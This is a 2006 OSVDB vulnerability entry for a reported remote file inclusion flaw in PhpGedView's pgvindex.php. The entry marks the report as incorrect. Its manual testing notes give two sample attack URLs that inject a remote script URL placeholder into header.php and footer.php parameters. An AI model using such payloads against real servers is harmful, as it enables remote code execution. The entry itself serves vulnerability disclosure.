PhpGedView pgvindex.php DOCUMENT_ROOT Variable Remote File Inclusion

2006-11-27T18:16:34
ID OSVDB:32031
Type osvdb
Reporter OSVDB
Modified 2006-11-27T18:16:34

Description

Solution Description

The vulnerability reported is incorrect. No solution required.

Manual Testing Notes

http://[target]/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=|SCRIPT-URL| http://[target]/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/footer.php=|SCRIPT-URL|

References:

Vendor URL: http://www.phpgedview.net/ Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0558.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0530.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0552.html